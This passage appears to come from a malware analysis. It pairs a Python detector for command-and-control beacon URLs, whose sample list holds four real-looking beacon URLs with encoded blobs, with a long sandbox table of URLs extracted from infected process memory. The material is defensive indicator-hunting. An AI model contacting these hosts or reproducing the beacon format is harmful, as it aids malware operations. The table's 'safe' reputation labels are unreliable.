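alphanumeric token. The length bounds below are the editor's assumptions.
"""
import re
from urllib.parse import urlsplit

PATH_RE = re.compile(r"/[a-z0-9]{4}/")
NAME_RE = re.compile(r"[A-Za-z0-9]{2,5}")
BLOB_RE = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")  # base64 alphabet, '+' kept as-is
TOKEN_RE = re.compile(r"[A-Za-z0-9]{6,16}")

# URLs copied from the report's tables. The first four are beacons; the last
# four are controls that must not match: a bare beacon path without a query, a
# string truncated during memory extraction, WordPress site content pulled back
# by the injected thread, and a browser search URL.
SAMPLE_URLS = [
    "http://www.mysticriverpath.com/6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcL",
    "http://www.rtpdewata4d-16.xyz/1mac/?UbV=vFCnEL2gmua2cn7cu+7uA1zrn4XuDHvsitE9TDncytOkj3MvcAAJscub939fSKqOURYthMBxIAmeZUaSv4+xK96qNWaFi0LmQ135fUkfGeU9K1xxgFotmEw=&Y4gp=mlltcrRxcL",
    "http://www.bearclaw.bot/f6em/?UbV=3scc/l+m0dTfturexYmDD/ihdyc/GZ5DxLslLbTADZTZz0L4ImmnnfNh8/fEKVgbyf/SBi86BZffcRTKk/E5LLaY5QN8jxf/mVG9V1ZF+n+osgl4kzW2NMc=&Y4gp=mlltcrRxcL",
    "http://www.kera333.org/9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcL",
    "http://www.bb58cc.com/sq05/",
    "https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4",
    "https://www.itsjojosiwas.com/wp-includes/js/dist/data.min.js?ver=dc5f255634f3da29c8d5",
    "https://duckduckgo.com/ac/?q=",
]


def split_query(query):
    """Split a raw query string into (name, value) pairs without any decoding."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def parse_beacon(url):
    """Return {host, path, names, token} if url has the beacon shape, else None."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not PATH_RE.fullmatch(parts.path):
        return None
    pairs = split_query(parts.query)
    if len(pairs) != 2:
        return None
    (name1, blob), (name2, token) = pairs
    if not (NAME_RE.fullmatch(name1) and NAME_RE.fullmatch(name2)):
        return None
    if not (BLOB_RE.fullmatch(blob) and TOKEN_RE.fullmatch(token)):
        return None
    return {"host": parts.hostname, "path": parts.path, "names": (name1, name2), "token": token}


def summarize(urls):
    """Group beacon hits by host and collect the parameter-name pairs and tokens seen."""
    hosts, names, tokens = {}, set(), set()
    for url in urls:
        hit = parse_beacon(url)
        if hit is None:
            continue
        hosts.setdefault(hit["host"], set()).add(hit["path"])
        names.add(hit["names"])
        tokens.add(hit["token"])
    return {"hosts": hosts, "names": names, "tokens": tokens}


if __name__ == "__main__":
    summary = summarize(SAMPLE_URLS)
    for host in sorted(summary["hosts"]):
        print(host, sorted(summary["hosts"][host]))
    print("parameter names:", sorted(summary["names"]))
    print("second-parameter tokens:", sorted(summary["tokens"]))
```

Run against proxy logs, the interesting output is not the individual hit but the grouping: a single client hitting many unrelated hosts with the same parameter-name pair and the same second-parameter token within minutes is the beacon sweep this report shows, and the names and token are constant per build, so they make a better pivot than the hosts, which the operator rotates.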
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabmakecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/data.min.js?ver=dc5f255634f3da29c8d5makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/sample-page/makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/ac/?q=makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/feed/makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/refund_returns/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/?s=makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/product-category/armen-living/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-settings.js?ver=makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react-dom.min.js?ver=18.2.0makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4makecab.exe, 00000006.00000002.4101618826.000000000588E000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.00000000033DE000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/ie-fallback.cssmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://connect.facebook.net/en_US/fbevents.jsmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-json/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woffmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/xmlrpc.php?rsdmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution-blomakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/product-category/pferd/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/redux-routine.min.js?ver=0be1b2a6a79703e28531makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/url.min.js?ver=b4979979018b684be209makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/keycodes.min.js?ver=3460bd0fac9859d6886cmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/xmlrpc.php?rsdmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.comrULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-middlewarmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/my-account/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/priority-queue.min.js?ver=422e19e9d48b269c5219makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/data-controls.min.js?ver=fe4ccc8a1782ea8e2cb1makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsomemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=1makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/escape-html.min.js?ver=03e27a7b6ae14f7afaa6makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://schema.orgmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.ecosia.org/newtab/makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.minmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://gmpg.org/xfn/11makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/dom-ready.min.js?ver=392bdd43726760d1f3camakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?vemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-admin/admin-ajax.php?action=rest-noncemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-registry.makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/fl-icons.css?ver=3.12makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react.min.js?ver=18.2.0makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/shipping-info/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/is-shallow-equal.min.js?ver=20c2b06ecf04afb14feemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woffmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-components.jmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-checkout.js?makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/xmlrpc.phpmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/wp-includes/js/dist/vendor/wp-polyfill-importmap.min.js?ver=1.8.2makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/conditions-of-use/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/feed/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://yoast.com/wordpress/plugins/seo/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/libs/ie-flexibility.jsmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/uploads/2024/06/cropped-pngtree-ship-logo-cruise-or-ship-logrULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.itsjojosiwas.com/product-category/permatex/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-data.js?vmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://wordpress.org/plugins/woocommerce-conversion-tracking/)makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/element.min.js?ver=ed1c7604880e8b574b40makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/product-category/esf/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/style.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmakecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?vermakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.onlandtoy.com/wp-includes/js/dist/interactivity.min.js?ver=6.5.2makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/deprecated.min.js?ver=73ad3591e7bc95f4777amakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/lodash.min.js?ver=4.17.19makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212efmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://wpzipped.com/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
